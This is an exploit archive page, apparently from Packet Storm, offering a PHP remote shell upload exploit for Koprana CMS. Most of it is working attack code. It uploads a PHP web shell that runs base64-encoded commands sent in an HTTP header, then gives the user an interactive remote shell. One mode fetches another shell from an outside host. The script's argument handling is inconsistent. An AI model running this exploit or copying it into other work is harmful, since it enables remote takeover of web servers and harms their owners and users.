exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Koprana CMS Shell Upload

Koprana CMS Shell Upload
Posted Apr 11, 2012
Authored by The UnKn0wN

Koprana CMS remote shell upload exploit written in PHP.

tags | exploit, remote, shell, php
SHA-256 | 8d3b750e079db72cdf1375b60505c4691cf36b74583357d5e66d952c663400c6

Koprana CMS Shell Upload

Change Mirror Download
<?php
//NOTE : - If you are using BHR put this file in \exploits\webapp folder
// - BHR Download link => http://www.mediafire.com/?ij9rfpfw6s7uzxf (for windows only)
/*
load exploits/webapp/koprana_upload.php
set HOST target
set PORT Taget_PORT (default : 80)
set MODE (1 for backdoor upload/2 for shell upload)
set FILE (save format TXT/SQL)
exploit

!koprana_upload
@ HOST = localhost = Target URL
@ PORT = 80 = Target Port
@ PATH = / = Web site path
@ MODE = 1 = Exploit Mode
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

function http_send($host, $port,$packet)
{
if (!($sock = fsockopen($host, $port)))
die("\n[-] No response from {$host}:{$port}\n");

fputs($sock, $packet);
return stream_get_contents($sock);
}

print "\n+-----------------------[ The Crazy3D Team ]--------------------------+";
print "\n| Koprana CMS Remote Upload Exploit |";
print "\n| by The UnKn0wN |";
print "\n| Greets to : The Crazy3D members and all Algerian h4x0rs |";
print "\n+---------------------------------------------------------------------+";
print "\n| www.Dofus-Exploit.com | WwW.IzzI-Hack.com |";
print "\n+---------------------------------------------------------------------+\n";

if ($argc < 3)
{
print "\nUsage......: php $argv[0] <host> <path> <mode>\n";
print "\nExample....: php $argv[0] localhost / 1";
print "\nExample....: php $argv[0] localhost /site/ 2\n";
die();
}

$host = $argv[1];
$port = $argv[2];
$path = $argv[3];
$mode = $argv[4];

$shell = "<?php error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die; ?>";
$shell2 = file_get_contents("http://dofus-exploit.com/exploit/ibiza.txt"); //username : UnKnOwN password : lolilol (You can modify this by your own shell)

if($mode == "2") $shell = $shell2;

$boundary = "---------".str_replace(".", "", microtime());
$payload = "--{$boundary}\r\n";
$payload .= "Content-Disposition: form-data; name=\"fichier\"; filename=\"sh.php\"\r\n";
$payload .= "Content-Type: application/x-php\r\n\r\n";
$payload .= "".$shell."\n\r\n";
$payload .= "--{$boundary}\r\n";
$payload .= "Content-Disposition: form-data; name=\"execute\"\r\n\r\nexecute\r\n";
$payload .= "--{$boundary}\r\n";
$payload .= "Content-Disposition: form-data; name=\"dossier\"\r\n\r\n./\r\n";
$payload .= "--{$boundary}--\r\n";

$packet = "POST {$path}index.php?pages=buy1_ontrue HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Type: multipart/form-data; boundary={$boundary}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: keep-alive\r\n\r\n{$payload}";

http_send($host,$port, $packet);
if($mode == "1") {

$packet = "GET {$path}sh.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";

if (!($sock = http_send($host,$port, $packet))) die("\n[-] Upload failed!\n");
print "[+]Backdoor was upload!\n[+]Getting the shell...\n";
while(1)
{
print "\nBHR@{$host}# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
preg_match("/_code_(.*)/s", http_send($host,$port, sprintf($packet, base64_encode($cmd))), $m) ?
print $m[1] : die("\n[-] Exploit failed!\n");
}
}else
print "Go to {$host}{$path}sh.php to check.\n";

?>
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close